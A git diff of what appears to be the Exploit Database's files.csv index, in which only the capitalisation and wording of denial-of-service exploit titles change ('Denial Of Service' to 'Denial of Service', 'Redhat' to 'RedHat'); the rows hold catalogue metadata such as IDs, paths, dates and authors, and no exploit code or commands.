diff --git a/files.csv b/files.csv index 24c67184e..82c801a8e 100755 --- a/files.csv +++ b/files.csv @@ -31,7 +31,7 @@ id,file,description,date,author,platform,type,port 214,platforms/windows/dos/214.c,"Microsoft Windows - 'Jolt2.c' Denial of Service",2000-12-02,phonix,windows,dos,0 233,platforms/windows/dos/233.pl,"Solaris 2.7 / 2.8 Catman - Local Insecure tmp Symlink Exploit",2000-12-19,"Shane Hird",windows,dos,0 235,platforms/solaris/dos/235.pl,"SunOS 5.7 Catman - Local Insecure tmp Symlink Clobber Exploit",2000-12-20,lwc,solaris,dos,0 -236,platforms/linux/dos/236.sh,"Redhat 6.1 / 6.2 - TTY Flood Users Exploit",2001-01-02,teleh0r,linux,dos,0 +236,platforms/linux/dos/236.sh,"RedHat 6.1 / 6.2 - TTY Flood Users Exploit",2001-01-02,teleh0r,linux,dos,0 238,platforms/linux/dos/238.c,"ml2 - Local users can Crash processes",2001-01-03,Stealth,linux,dos,0 240,platforms/solaris/dos/240.sh,"Solaris 2.6 / 7 / 8 - Lock Users Out of mailx Exploit",2001-01-03,Optyx,solaris,dos,0 241,platforms/linux/dos/241.c,"ProFTPd 1.2.0 (rc2) - memory leakage example Exploit",2001-01-03,"Piotr Zurawski",linux,dos,21 @@ -116,7 +116,7 @@ id,file,description,date,author,platform,type,port 691,platforms/linux/dos/691.c,"Linux Kernel 2.4.28 / 2.6.9 - Memory Leak Local Denial of Service",2004-12-16,"Georgi Guninski",linux,dos,0 692,platforms/linux/dos/692.c,"Linux Kernel 2.4.28 / 2.6.9 - 'ip_options_get' Local Overflow",2004-12-16,"Georgi Guninski",linux,dos,0 700,platforms/windows/dos/700.html,"Microsoft Internet Explorer / MSN - Memory_Access_Violation Denial of Service",2004-12-21,"Emmanouel Kellinis",windows,dos,0 -721,platforms/windows/dos/721.html,"Microsoft Windows - Kernel ANI File Parsing Crash",2004-12-25,Flashsky,windows,dos,0 +721,platforms/windows/dos/721.html,"Microsoft Windows Kernel - '.ANI' File Parsing Crash",2004-12-25,Flashsky,windows,dos,0 736,platforms/windows/dos/736.c,"SOLDNER Secret Wars 30830 - Denial of Service",2005-01-04,"Luigi Auriemma",windows,dos,20000 738,platforms/php/dos/738.c,"iWebNegar 1.1 - Configuration Nullification Denial of Service",2005-01-04,c0d3r,php,dos,0 742,platforms/windows/dos/742.c,"Gore 1.50 - Socket Unreacheable Denial of Service",2005-01-06,"Luigi Auriemma",windows,dos,0 @@ -284,7 +284,7 @@ id,file,description,date,author,platform,type,port 1489,platforms/multiple/dos/1489.pl,"Invision Power Board 2.1.4 - (Register Users) Denial of Service",2006-02-10,SkOd,multiple,dos,0 1496,platforms/hardware/dos/1496.c,"D-Link (Wireless Access Point) - (Fragmented UDP) Denial of Service",2006-02-14,"Aaron Portnoy",hardware,dos,0 1500,platforms/windows/dos/1500.cpp,"Microsoft Windows Media Player 7.1 <= 10 - BMP Heap Overflow PoC (MS06-005) (1)",2006-02-15,ATmaCA,windows,dos,0 -1517,platforms/php/dos/1517.c,"PunBB 2.0.10 - (Register Multiple Users) Denial Of Service",2006-02-20,K4P0,php,dos,0 +1517,platforms/php/dos/1517.c,"PunBB 2.0.10 - (Register Multiple Users) Denial of Service",2006-02-20,K4P0,php,dos,0 1531,platforms/windows/dos/1531.pl,"ArGoSoft FTP Server 1.4.3.5 - Remote Buffer Overflow (PoC)",2006-02-25,"Jerome Athias",windows,dos,0 1535,platforms/windows/dos/1535.c,"CrossFire 1.8.0 - (oldsocketmode) Remote Buffer Overflow (PoC)",2006-02-27,"Luigi Auriemma",windows,dos,0 1540,platforms/bsd/dos/1540.pl,"FreeBSD 6.0 - (nfsd) Remote Kernel Panic Denial of Service",2006-02-28,"Evgeny Legerov",bsd,dos,0 @@ -481,7 +481,7 @@ id,file,description,date,author,platform,type,port 3157,platforms/windows/dos/3157.html,"DivX Player 6.4.1 - DivXBrowserPlugin 'npdivx32.dll' IE Denial of Service",2007-01-19,shinnai,windows,dos,0 3160,platforms/osx/dos/3160.html,"Transmit.app 3.5.5 - 'ftps://' URL Handler Heap Buffer Overflow (PoC)",2007-01-20,MoAB,osx,dos,0 3166,platforms/osx/dos/3166.html,"Apple iChat 3.1.6 441 - 'aim://' URL Handler Format String (PoC)",2007-01-21,MoAB,osx,dos,0 -3167,platforms/osx/dos/3167.c,"Apple Mac OSX 10.4.x - Kernel shared_region_map_file_np() Memory Corruption",2007-01-21,"Adriano Lima",osx,dos,0 +3167,platforms/osx/dos/3167.c,"Apple Mac OSX 10.4.x Kernel - shared_region_map_file_np() Memory Corruption",2007-01-21,"Adriano Lima",osx,dos,0 3182,platforms/windows/dos/3182.py,"Sami HTTP Server 2.0.1 - HTTP 404 Object not found Denial of Service",2007-01-23,shinnai,windows,dos,0 3190,platforms/windows/dos/3190.py,"Microsoft Windows - Explorer (.AVI) Unspecified Denial of Service",2007-01-24,shinnai,windows,dos,0 3193,platforms/windows/dos/3193.py,"Microsoft Excel - Malformed Palette Record Denial of Service PoC (MS07-002)",2007-01-25,LifeAsaGeek,windows,dos,0 @@ -500,9 +500,9 @@ id,file,description,date,author,platform,type,port 3289,platforms/linux/dos/3289.c,"Axigen 2.0.0b1 - Remote Denial of Service (1)",2007-02-08,mu-b,linux,dos,0 3290,platforms/linux/dos/3290.c,"Axigen 2.0.0b1 - Remote Denial of Service (2)",2007-02-08,mu-b,linux,dos,0 3304,platforms/windows/dos/3304.py,"MiniWebsvr 0.0.6 - Remote Resource Consumption Denial of Service",2007-02-13,shinnai,windows,dos,0 -3306,platforms/windows/dos/3306.pl,"MailEnable Professional/Enterprise 2.35 - Out of Bounds Denial Of Service",2007-02-14,mu-b,windows,dos,0 +3306,platforms/windows/dos/3306.pl,"MailEnable Professional/Enterprise 2.35 - Out of Bounds Denial of Service",2007-02-14,mu-b,windows,dos,0 3307,platforms/windows/dos/3307.html,"ActSoft DVD-Tools - 'dvdtools.ocx' Remote Buffer Overflow (PoC)",2007-02-14,shinnai,windows,dos,0 -3308,platforms/windows/dos/3308.pl,"MailEnable Professional/Enterprise 2.37 - Denial Of Service",2007-02-14,mu-b,windows,dos,0 +3308,platforms/windows/dos/3308.pl,"MailEnable Professional/Enterprise 2.37 - Denial of Service",2007-02-14,mu-b,windows,dos,0 3331,platforms/windows/dos/3331.c,"VicFTPS < 5.0 - (CWD) Remote Buffer Overflow (PoC)",2007-02-18,r0ut3r,windows,dos,0 3341,platforms/windows/dos/3341.cpp,"TurboFTP Server 5.30 Build 572 - 'newline/LIST' Multiple Remote Denial of Service",2007-02-20,Marsu,windows,dos,0 3343,platforms/windows/dos/3343.cpp,"FTP Voyager 14.0.0.3 - (CWD) Remote Stack Overflow (PoC)",2007-02-20,Marsu,windows,dos,0 @@ -656,7 +656,7 @@ id,file,description,date,author,platform,type,port 4610,platforms/windows/dos/4610.html,"Viewpoint Media Player for IE 3.2 - Remote Stack Overflow (PoC)",2007-11-06,shinnai,windows,dos,0 4613,platforms/windows/dos/4613.html,"Adobe Shockwave - ShockwaveVersion() Stack Overflow (PoC)",2007-11-08,Elazar,windows,dos,0 4615,platforms/multiple/dos/4615.txt,"MySQL 5.0.45 - (Alter) Denial of Service",2007-11-09,"Kristian Hermansen",multiple,dos,0 -4624,platforms/osx/dos/4624.c,"Apple Mac OSX 10.4.x - Kernel i386_set_ldt() Integer Overflow (PoC)",2007-11-16,"RISE Security",osx,dos,0 +4624,platforms/osx/dos/4624.c,"Apple Mac OSX 10.4.x Kernel - i386_set_ldt() Integer Overflow (PoC)",2007-11-16,"RISE Security",osx,dos,0 4648,platforms/multiple/dos/4648.py,"Apple QuickTime 7.2/7.3 - RTSP Response Remote Overwrite (SEH)",2007-11-23,h07,multiple,dos,0 4682,platforms/windows/dos/4682.c,"Microsoft Windows Media Player - AIFF Divide By Zero Exception Denial of Service (PoC)",2007-11-29,"Gil-Dong / Woo-Chi",windows,dos,0 4683,platforms/windows/dos/4683.py,"RealPlayer 11 - '.au' Denial of Service",2007-12-01,NtWaK0,windows,dos,0 @@ -700,17 +700,17 @@ id,file,description,date,author,platform,type,port 5184,platforms/windows/dos/5184.py,"MyServer 0.8.11 - '204 No Content' error Remote Denial of Service",2008-02-25,shinnai,windows,dos,0 5191,platforms/multiple/dos/5191.c,"Apple Mac OSX xnu 1228.3.13 - IPv6-ipcomp Remote kernel Denial of Service (PoC)",2008-02-26,mu-b,multiple,dos,0 5201,platforms/windows/dos/5201.txt,"Crysis 1.1.1.5879 - Remote Format String Denial of Service (PoC)",2008-02-28,"Long Poke",windows,dos,0 -5210,platforms/linux/dos/5210.c,"Galaxy FTP Server 1.0 - (Neostrada Livebox DSL Router) Denial Of Service",2008-03-01,0in,linux,dos,0 +5210,platforms/linux/dos/5210.c,"Galaxy FTP Server 1.0 - (Neostrada Livebox DSL Router) Denial of Service",2008-03-01,0in,linux,dos,0 5217,platforms/windows/dos/5217.html,"ICQ Toolbar 2.3 - ActiveX Remote Denial of Service",2008-03-06,spdr,windows,dos,0 5225,platforms/windows/dos/5225.html,"KingSoft - 'UpdateOcx2.dll' SetUninstallName() Heap Overflow (PoC)",2008-03-10,void,windows,dos,0 5229,platforms/multiple/dos/5229.txt,"asg-sentry 7.0.0 - Multiple Vulnerabilities",2008-03-10,"Luigi Auriemma",multiple,dos,0 -5235,platforms/windows/dos/5235.py,"MailEnable 3.13 SMTP Service - 'VRFY/EXPN' Command Denial Of Service",2008-03-11,ryujin,windows,dos,0 +5235,platforms/windows/dos/5235.py,"MailEnable 3.13 SMTP Service - 'VRFY/EXPN' Command Denial of Service",2008-03-11,ryujin,windows,dos,0 5258,platforms/solaris/dos/5258.c,"SunOS 5.10 Sun Cluster - rpc.metad Denial of Service (PoC)",2008-03-14,kingcope,solaris,dos,0 5261,platforms/windows/dos/5261.py,"Rosoft Media Player 4.1.8 - RML Stack Based Buffer Overflow (PoC)",2008-03-15,"Wiktor Sierocinski",windows,dos,0 5268,platforms/multiple/dos/5268.html,"Apple Safari (webkit) (iPhone/OSX/Windows) - Remote Denial of Service",2008-03-17,"Georgi Guninski",multiple,dos,0 5270,platforms/windows/dos/5270.pl,"Home FTP Server 1.4.5 - Remote Denial of Service",2008-03-17,0in,windows,dos,0 -5306,platforms/multiple/dos/5306.txt,"snircd 1.3.4 - (send_user_mode) Denial of Service",2008-03-24,"Chris Porter",multiple,dos,0 -5307,platforms/linux/dos/5307.pl,"MPlayer - sdpplin_parse() Array Indexing Buffer Overflow (PoC)",2008-03-25,"Guido Landi",linux,dos,0 +5306,platforms/multiple/dos/5306.txt,"Snircd 1.3.4 - 'send_user_mode' Denial of Service",2008-03-24,"Chris Porter",multiple,dos,0 +5307,platforms/linux/dos/5307.pl,"MPlayer 1.0 rc2 - 'sdpplin_parse()' Array Indexing Buffer Overflow (PoC)",2008-03-25,"Guido Landi",linux,dos,0 5316,platforms/windows/dos/5316.py,"PacketTrap Networks pt360 2.0.39 TFTPD - Remote Denial of Service",2008-03-26,muts,windows,dos,0 5321,platforms/windows/dos/5321.txt,"Visual Basic - 'vbe6.dll' Local Stack Overflow PoC / Denial of Service",2008-03-30,Marsu,windows,dos,0 5327,platforms/windows/dos/5327.txt,"Microsoft Windows - Explorer Unspecified .doc File Denial of Service",2008-03-31,"Iron Team",windows,dos,0 @@ -774,7 +774,7 @@ id,file,description,date,author,platform,type,port 6262,platforms/windows/dos/6262.txt,"VMware Workstation - 'hcmon.sys 6.0.0.45731' Local Denial of Service",2008-08-18,g_,windows,dos,0 6293,platforms/multiple/dos/6293.txt,"VideoLAN VLC Media Player 0.8.6i - Mms Protocol Handling Heap Overflow (PoC)",2008-08-23,g_,multiple,dos,0 6319,platforms/windows/dos/6319.html,"Ultra Office - ActiveX Control Arbitrary File Corruption Exploit",2008-08-27,shinnai,windows,dos,0 -6326,platforms/windows/dos/6326.html,"LogMeIn Remote Access Utility - ActiveX Memory Corruption (Denial Of Service)",2008-08-29,"YAG KOHHA",windows,dos,0 +6326,platforms/windows/dos/6326.html,"LogMeIn Remote Access Utility - ActiveX Memory Corruption (Denial of Service)",2008-08-29,"YAG KOHHA",windows,dos,0 6327,platforms/windows/dos/6327.html,"Najdi.si Toolbar - ActiveX Remote Buffer Overflow (PoC)",2008-08-29,shinnai,windows,dos,0 6330,platforms/windows/dos/6330.txt,"Microsoft Windows - GDI (CreateDIBPatternBrushPt) Heap Overflow (PoC)",2008-08-29,Ac!dDrop,windows,dos,0 6345,platforms/windows/dos/6345.html,"VMware - COM API ActiveX Remote Buffer Overflow (PoC)",2008-09-01,shinnai,windows,dos,0 @@ -1228,7 +1228,7 @@ id,file,description,date,author,platform,type,port 9956,platforms/hardware/dos/9956.txt,"Palm Pre WebOS 1.1 - Denial of Service",2009-10-14,"Townsend Harris",hardware,dos,0 9969,platforms/multiple/dos/9969.txt,"Snort 2.8.5 - IPv6 Denial of Service",2009-10-23,"laurent gaffie",multiple,dos,0 9980,platforms/hardware/dos/9980.txt,"Websense Email Security - Denial of Service",2009-10-20,"Nikolas Sotiriu",hardware,dos,0 -9987,platforms/multiple/dos/9987.txt,"ZoIPer 2.22 - Call-Info Remote Denial Of Service",2009-10-14,"Tomer Bitton",multiple,dos,5060 +9987,platforms/multiple/dos/9987.txt,"ZoIPer 2.22 - Call-Info Remote Denial of Service",2009-10-14,"Tomer Bitton",multiple,dos,5060 9999,platforms/windows/dos/9999.txt,"Cerberus FTP server 3.0.6 - Unauthenticated Denial of Service",2009-09-30,"Francis Provencher",windows,dos,21 10004,platforms/multiple/dos/10004.txt,"Dopewars Server 1.5.12 - Denial of Service",2009-10-06,"Doug Prostko",multiple,dos,7902 10005,platforms/windows/dos/10005.py,"Microsoft Windows 7 / Server 2008R2 - Remote Kernel Crash",2009-11-11,"laurent gaffie",windows,dos,445 @@ -1462,7 +1462,7 @@ id,file,description,date,author,platform,type,port 12001,platforms/windows/dos/12001.pl,"Kwik Pay Payroll 4.10.3 - '.zip' Denial of Service",2010-04-01,anonymous,windows,dos,0 12010,platforms/windows/dos/12010.pl,"uTorrent WebUI 0.370 - Authorisation Header Denial of Service",2010-04-02,"zombiefx darkernet",windows,dos,0 12011,platforms/windows/dos/12011.txt,"Google Chrome 4.1 - OOB Array Indexing",2010-04-02,"Tobias Klein",windows,dos,0 -12025,platforms/windows/dos/12025.php,"Dualis 20.4 - '.bin' Local Denial Of Service",2010-04-03,"Yakir Wizman",windows,dos,0 +12025,platforms/windows/dos/12025.php,"Dualis 20.4 - '.bin' Local Denial of Service",2010-04-03,"Yakir Wizman",windows,dos,0 12027,platforms/windows/dos/12027.py,"DSEmu 0.4.10 - '.nds' Local Crash",2010-04-03,l3D,windows,dos,0 12030,platforms/windows/dos/12030.html,"IncrediMail 2.0 - ActiveX (Authenticate) Buffer Overflow (PoC)",2010-04-03,d3b4g,windows,dos,0 12032,platforms/windows/dos/12032.html,"Microsoft Internet Explorer Tabular Data Control - ActiveX Remote Code Execution",2010-04-03,ZSploit.com,windows,dos,0 @@ -1535,7 +1535,7 @@ id,file,description,date,author,platform,type,port 12529,platforms/windows/dos/12529.py,"ESET Smart Security 4.2 and NOD32 AntiVirus 4.2 (x32/x64) - LZH archive parsing (PoC)",2010-05-07,"Oleksiuk Dmitry_ eSage Lab",windows,dos,0 12530,platforms/windows/dos/12530.rb,"TFTPGUI 1.4.5 - Long Transport Mode Overflow Denial of Service (Metasploit)",2010-05-08,"Jeremiah Talamantes",windows,dos,0 12531,platforms/windows/dos/12531.pl,"GeoHttpServer - Remote Denial of Service",2010-05-08,aviho1,windows,dos,0 -12541,platforms/windows/dos/12541.php,"Dolphin 2.0 - '.elf' Local Denial Of Service",2010-05-09,"Yakir Wizman",windows,dos,0 +12541,platforms/windows/dos/12541.php,"Dolphin 2.0 - '.elf' Local Denial of Service",2010-05-09,"Yakir Wizman",windows,dos,0 12546,platforms/windows/dos/12546.pl,"Hyplay 1.2.326.1 - '.asx' Local Denial of Service Crash (PoC)",2010-05-10,"Steve James",windows,dos,0 12554,platforms/php/dos/12554.txt,"MiniManager For Mangos/Trinity Server - Denial of Service",2010-05-10,XroGuE,php,dos,0 12555,platforms/multiple/dos/12555.txt,"Pargoon CMS - Denial of Service",2010-05-10,"Pouya Daneshmand",multiple,dos,0 @@ -1563,7 +1563,7 @@ id,file,description,date,author,platform,type,port 12752,platforms/windows/dos/12752.c,"Adobe Photoshop CS4 Extended 11.0 - '.GRD' File Handling Remote Buffer Overflow (PoC)",2010-05-26,LiquidWorm,windows,dos,0 12753,platforms/windows/dos/12753.c,"Adobe Photoshop CS4 Extended 11.0 - '.ASL' File Handling Remote Buffer Overflow (PoC)",2010-05-26,LiquidWorm,windows,dos,0 12762,platforms/freebsd/dos/12762.txt,"FreeBSD 8.0 ftpd - off-by one PoC (FreeBSD-SA-10:05)",2010-05-27,"Maksymilian Arciemowicz",freebsd,dos,0 -12774,platforms/windows/dos/12774.py,"Home FTP Server r1.10.3 (build 144) - Denial of Service",2010-05-28,Dr_IDE,windows,dos,0 +12774,platforms/windows/dos/12774.py,"Home FTP Server 1.10.3 (build 144) - Denial of Service",2010-05-28,Dr_IDE,windows,dos,0 12775,platforms/multiple/dos/12775.py,"VideoLAN VLC Media Player 1.0.6 - '.avi' Media File Crash (PoC)",2010-05-28,Dr_IDE,multiple,dos,0 12816,platforms/windows/dos/12816.py,"ZipExplorer 7.0 - '.zar' Denial of Service",2010-05-31,TecR0c,windows,dos,0 12852,platforms/windows/dos/12852.txt,"QtWeb 3.3 - Remote Denial of Service/Crash",2010-06-03,PoisonCode,windows,dos,0 @@ -1893,7 +1893,7 @@ id,file,description,date,author,platform,type,port 16192,platforms/linux/dos/16192.pl,"Novell Iprint - LPD Remote Code Execution",2011-02-18,"Francis Provencher",linux,dos,0 16254,platforms/windows/dos/16254.txt,"Nitro PDF Reader 1.4.0 - Heap Memory Corruption (PoC)",2011-02-28,LiquidWorm,windows,dos,0 16203,platforms/windows/dos/16203.txt,"WinMerge 2.12.4 - Project File Handling Stack Overflow",2011-02-22,LiquidWorm,windows,dos,0 -16216,platforms/linux/dos/16216.txt,"Red Hat Linux - stickiness of /tmp Exploit",2011-02-23,"Tavis Ormandy",linux,dos,0 +16216,platforms/linux/dos/16216.txt,"RedHat Linux - Stickiness of /tmp Exploit",2011-02-23,"Tavis Ormandy",linux,dos,0 16230,platforms/windows/dos/16230.py,"Victory FTP Server 5.0 - Denial of Service",2011-02-24,"C4SS!0 G0M3S",windows,dos,0 16234,platforms/netware/dos/16234.rb,"Novell Netware - RPC XNFS xdrDecodeString",2011-02-24,"Francis Provencher",netware,dos,0 16237,platforms/windows/dos/16237.py,"Elecard MPEG Player 5.7 - Local Buffer Overflow PoC (SEH)",2011-02-24,badc0re,windows,dos,0 @@ -2033,7 +2033,7 @@ id,file,description,date,author,platform,type,port 17889,platforms/windows/dos/17889.txt,"Sterling Trader 7.0.2 - Integer Overflow",2011-09-26,"Luigi Auriemma",windows,dos,0 17890,platforms/windows/dos/17890.c,"GMER 1.0.15.15641 - MFT Overwrite",2011-09-26,Heurs,windows,dos,0 17896,platforms/windows/dos/17896.txt,"PcVue 10.0 - Multiple Vulnerabilities",2011-09-27,"Luigi Auriemma",windows,dos,0 -17901,platforms/osx/dos/17901.c,"Apple Mac OSX < 10.6.7 - Kernel Panic Exploit",2011-09-28,hkpco,osx,dos,0 +17901,platforms/osx/dos/17901.c,"Apple Mac OSX < 10.6.7 - Kernel Panic",2011-09-28,hkpco,osx,dos,0 17903,platforms/windows/dos/17903.txt,"NCSS 07.1.21 - Array Overflow with Write2",2011-09-29,"Luigi Auriemma",windows,dos,0 17908,platforms/freebsd/dos/17908.sh,"FreeBSD - UIPC socket heap Overflow (PoC)",2011-09-30,"Shaun Colley",freebsd,dos,0 17918,platforms/windows/dos/17918.txt,"Adobe Photoshop Elements 8.0 - Multiple Arbitrary Code Execution Vulnerabilities",2011-10-02,LiquidWorm,windows,dos,0 @@ -2573,7 +2573,7 @@ id,file,description,date,author,platform,type,port 21126,platforms/multiple/dos/21126.c,"6Tunnel 0.6/0.7/0.8 - Connection Close State Denial of Service",2001-10-23,awayzzz,multiple,dos,0 21131,platforms/windows/dos/21131.txt,"Microsoft Windows 2000/XP - GDI Denial of Service",2001-10-29,PeterB,windows,dos,0 21147,platforms/windows/dos/21147.txt,"WAP Proof 2008 - Denial of Service",2012-09-08,"Orion Einfold",windows,dos,0 -21141,platforms/linux/dos/21141.txt,"Red Hat TUX 2.1.0-2 - HTTP Server Oversized Host Denial of Service",2001-11-05,"Aiden ORawe",linux,dos,0 +21141,platforms/linux/dos/21141.txt,"RedHat TUX 2.1.0-2 - HTTP Server Oversized Host Denial of Service",2001-11-05,"Aiden ORawe",linux,dos,0 21143,platforms/windows/dos/21143.pl,"Raptor Firewall 4.0/5.0/6.0.x - Zero Length UDP Packet Resource Consumption",2001-06-21,"Max Moser",windows,dos,0 21162,platforms/windows/dos/21162.pl,"Cooolsoft PowerFTP Server 2.0 3/2.10 - Multiple Denial of Service (1)",2001-11-29,"Alex Hernandez",windows,dos,0 21163,platforms/windows/dos/21163.pl,"Cooolsoft PowerFTP Server 2.0 3/2.10 - Multiple Denial of Service (2)",2001-11-29,"Alex Hernandez",windows,dos,0 @@ -3145,7 +3145,7 @@ id,file,description,date,author,platform,type,port 24066,platforms/multiple/dos/24066.txt,"DiGi WWW Server 1 - Remote Denial of Service",2004-04-27,"Donato Ferrante",multiple,dos,0 24070,platforms/multiple/dos/24070.txt,"Rosiello Security Sphiro HTTPD 0.1B - Remote Heap Buffer Overflow",2004-04-30,"Slotto Corleone",multiple,dos,0 24078,platforms/linux/dos/24078.c,"PaX 2.6 Kernel Patch - Denial of Service",2004-05-03,Shadowinteger,linux,dos,0 -24080,platforms/windows/dos/24080.pl,"Titan FTP Server 3.0 - 'LIST' Command Denial Of Service",2004-05-04,storm,windows,dos,0 +24080,platforms/windows/dos/24080.pl,"Titan FTP Server 3.0 - 'LIST' Command Denial of Service",2004-05-04,storm,windows,dos,0 24095,platforms/linux/dos/24095.txt,"DeleGate 7.8.x/8.x - SSLway Filter Remote Stack Based Buffer Overflow",2004-05-06,"Joel Eriksson",linux,dos,0 24096,platforms/linux/dos/24096.pl,"Qualcomm Eudora 5.2.1/6.x - Embedded Hyperlink Buffer Overrun",2004-05-07,"Paul Szabo",linux,dos,0 24103,platforms/windows/dos/24103.txt,"MailEnable Mail Server HTTPMail 1.x - Remote Heap Overflow",2004-05-09,"Behrang Fouladi",windows,dos,0 @@ -3271,7 +3271,7 @@ id,file,description,date,author,platform,type,port 24812,platforms/windows/dos/24812.py,"aktiv-player 2.9.0 - Crash (PoC)",2013-03-15,metacom,windows,dos,0 24788,platforms/windows/dos/24788.py,"Nitro Pro 8.0.3.1 - Crash (PoC)",2013-03-15,"John Cobb",windows,dos,0 24793,platforms/multiple/dos/24793.txt,"JanaServer 2 - Multiple Remote Denial of Service Vulnerabilities",2004-11-30,"Luigi Auriemma",multiple,dos,0 -24799,platforms/multiple/dos/24799.txt,"Mozilla0.x / Netscape 3/4 / Firefox 1.0 - JavaScript IFRAME Rendering Denial Of Service",2004-12-06,"Niek van der Maas",multiple,dos,0 +24799,platforms/multiple/dos/24799.txt,"Mozilla0.x / Netscape 3/4 / Firefox 1.0 - JavaScript IFRAME Rendering Denial of Service",2004-12-06,"Niek van der Maas",multiple,dos,0 24804,platforms/linux/dos/24804.c,"Linux Kernel 2.6.x - 'AIO_Free_Ring' Local Denial of Service",2004-12-07,"Darrick J. Wong",linux,dos,0 24805,platforms/multiple/dos/24805.txt,"MySQL MaxDB 7.5 - WAHTTP Server Remote Denial of Service",2004-12-07,"Evgeny Demidov",multiple,dos,0 24807,platforms/multiple/dos/24807.txt,"MD5 - Message Digest Algorithm Hash Collision",2004-12-07,"Dan Kaminsky",multiple,dos,0 @@ -3804,7 +3804,7 @@ id,file,description,date,author,platform,type,port 40743,platforms/windows/dos/40743.html,"VBScript 5.8.7600.16385 / 5.8.9600.16384 - RegExpComp::PnodeParse Out-of-Bounds Read",2016-11-09,Skylined,windows,dos,0 30308,platforms/windows/dos/30308.py,"PotPlayer 1.5.42509 Beta - Denial of Service (Integer Division by Zero Exploit)",2013-12-15,sajith,windows,dos,0 30314,platforms/windows/dos/30314.txt,"Yahoo! Messenger 8.1 - Address Book Remote Buffer Overflow",2007-07-16,"Rajesh Sethumadhavan",windows,dos,0 -30791,platforms/multiple/dos/30791.txt,"I Hear U 0.5.6 - Multiple Remote Denial Of Service Vulnerabilities",2007-11-19,"Luigi Auriemma",multiple,dos,0 +30791,platforms/multiple/dos/30791.txt,"I Hear U 0.5.6 - Multiple Remote Denial of Service Vulnerabilities",2007-11-19,"Luigi Auriemma",multiple,dos,0 30395,platforms/php/dos/30395.txt,"PHP openssl_x509_parse() - Memory Corruption",2013-12-17,"Stefan Esser",php,dos,0 30397,platforms/windows/dos/30397.txt,"Microsoft Windows Kernel 'win32k.sys' - Integer Overflow (MS13-101)",2013-12-17,"Core Security",windows,dos,0 30401,platforms/php/dos/30401.php,"T1lib - intT1_Env_GetCompletePath Buffer Overflow",2007-07-26,r0ut3r,php,dos,0 @@ -3848,7 +3848,7 @@ id,file,description,date,author,platform,type,port 30590,platforms/windows/dos/30590.txt,"WinImage 8.0/8.10 - Malformed .IMG File BPB_BytsPerSec Field Denial of Service",2007-09-17,j00ru//vx,windows,dos,0 30592,platforms/multiple/dos/30592.py,"Python 2.2 ImageOP Module - Multiple Integer Overflow Vulnerabilities",2007-09-17,"Slythers Bro",multiple,dos,0 30593,platforms/windows/dos/30593.txt,"Microsoft MFC Library - CFileFind::FindFile Buffer Overflow",2007-09-14,"Jonathan Sarba",windows,dos,0 -30619,platforms/windows/dos/30619.txt,"Microsoft Windows Explorer - '.png' Image Local Denial Of Service",2007-07-26,"Xavier Roche",windows,dos,0 +30619,platforms/windows/dos/30619.txt,"Microsoft Windows Explorer - '.png' Image Local Denial of Service",2007-07-26,"Xavier Roche",windows,dos,0 30628,platforms/windows/dos/30628.txt,"FSD 2.052/3.000 - servinterface.cc servinterface::sendmulticast Function PIcallsign Command Remote Overflow",2007-10-01,"Luigi Auriemma",windows,dos,0 30644,platforms/multiple/dos/30644.txt,"Dawn of Time 1.69 MUD Server - Multiple Format String Vulnerabilities",2007-10-05,"Luigi Auriemma",multiple,dos,0 30646,platforms/linux/dos/30646.txt,"Nagios Plugins 1.4.2/1.4.9 - Location Header Remote Buffer Overflow",2007-07-16,"Nobuhiro Ban",linux,dos,0 @@ -3859,21 +3859,21 @@ id,file,description,date,author,platform,type,port 30805,platforms/windows/dos/30805.html,"RichFX Basic Player 1.1 - ActiveX Control Multiple Buffer Overflow Vulnerabilities",2007-11-25,"Elazar Broad",windows,dos,0 30688,platforms/hardware/dos/30688.py,"Motorola SBG6580 Cable Modem & Wireless Router - Denial of Service Reboot",2014-01-04,nicx0,hardware,dos,0 30702,platforms/multiple/dos/30702.html,"Mozilla Firefox 2.0.0.7 - Malformed XBL Constructor Remote Denial of Service",2007-10-22,"Soroush Dalili",multiple,dos,0 -30713,platforms/multiple/dos/30713.html,"Mozilla FireFox 2.0.8 - Sidebar Bookmark Persistent Denial Of Service",2007-10-26,"The Hacker Webzine",multiple,dos,0 +30713,platforms/multiple/dos/30713.html,"Mozilla FireFox 2.0.8 - Sidebar Bookmark Persistent Denial of Service",2007-10-26,"The Hacker Webzine",multiple,dos,0 30714,platforms/unix/dos/30714.pl,"IBM Lotus Domino 7.0.2 - IMAP4 LSUB Buffer Overflow",2007-10-27,"Manuel Santamarina Suarez",unix,dos,0 30724,platforms/linux/dos/30724.txt,"Perdition 1.17 - IMAPD __STR_VWRITE Remote Format String",2007-10-31,"Bernhard Mueller",linux,dos,0 -30744,platforms/linux/dos/30744.txt,"MySQL 5.1.23 - Server InnoDB CONVERT_SEARCH_MODE_TO_INNOBASE Function Denial Of Service",2007-11-05,"Joe Gallo",linux,dos,0 +30744,platforms/linux/dos/30744.txt,"MySQL 5.1.23 - Server InnoDB CONVERT_SEARCH_MODE_TO_INNOBASE Function Denial of Service",2007-11-05,"Joe Gallo",linux,dos,0 30749,platforms/windows/dos/30749.html,"Microsoft Office 2003 - Web Component Memory Access Violation Denial of Service",2007-11-12,"Elazar Broad",windows,dos,0 30753,platforms/php/dos/30753.txt,"AutoIndex PHP Script 2.2.2/2.2.3 - 'index.php' Denial of Service",2007-11-12,L4teral,php,dos,0 30756,platforms/windows/dos/30756.html,"Microsoft Forms 2.0 - ActiveX Control 2.0 Memory Access Violation Denial of Service Vulnerabilities",2007-11-12,"Elazar Broad",windows,dos,0 -30760,platforms/php/dos/30760.txt,"PHP 5.2.5 - Multiple GetText functions Denial Of Service Vulnerabilities",2007-11-13,"laurent gaffie",php,dos,0 +30760,platforms/php/dos/30760.txt,"PHP 5.2.5 - Multiple GetText functions Denial of Service Vulnerabilities",2007-11-13,"laurent gaffie",php,dos,0 30761,platforms/windows/dos/30761.html,"WebEx GPCContainer - Memory Access Violation Multiple Denial of Service Vulnerabilities",2007-11-13,"Elazar Broad",windows,dos,0 30763,platforms/linux/dos/30763.php,"KDE Konqueror 3.5.6 - Cookie Handling Denial of Service",2007-11-14,"laurent gaffie",linux,dos,0 40602,platforms/windows/dos/40602.html,"Microsoft Edge - 'Array.map' Heap Overflow (MS16-119)",2016-10-20,"Google Security Research",windows,dos,0 30766,platforms/linux/dos/30766.c,"GNU TAR 1.15.91 / CPIO 2.5.90 - safer_name_suffix Remote Denial of Service",2007-11-14,"Dmitry V. Levin",linux,dos,0 30767,platforms/windows/dos/30767.html,"Apple Safari 3.0.x - for Windows Document.Location.Hash Buffer Overflow",2007-06-25,"Azizov E",windows,dos,0 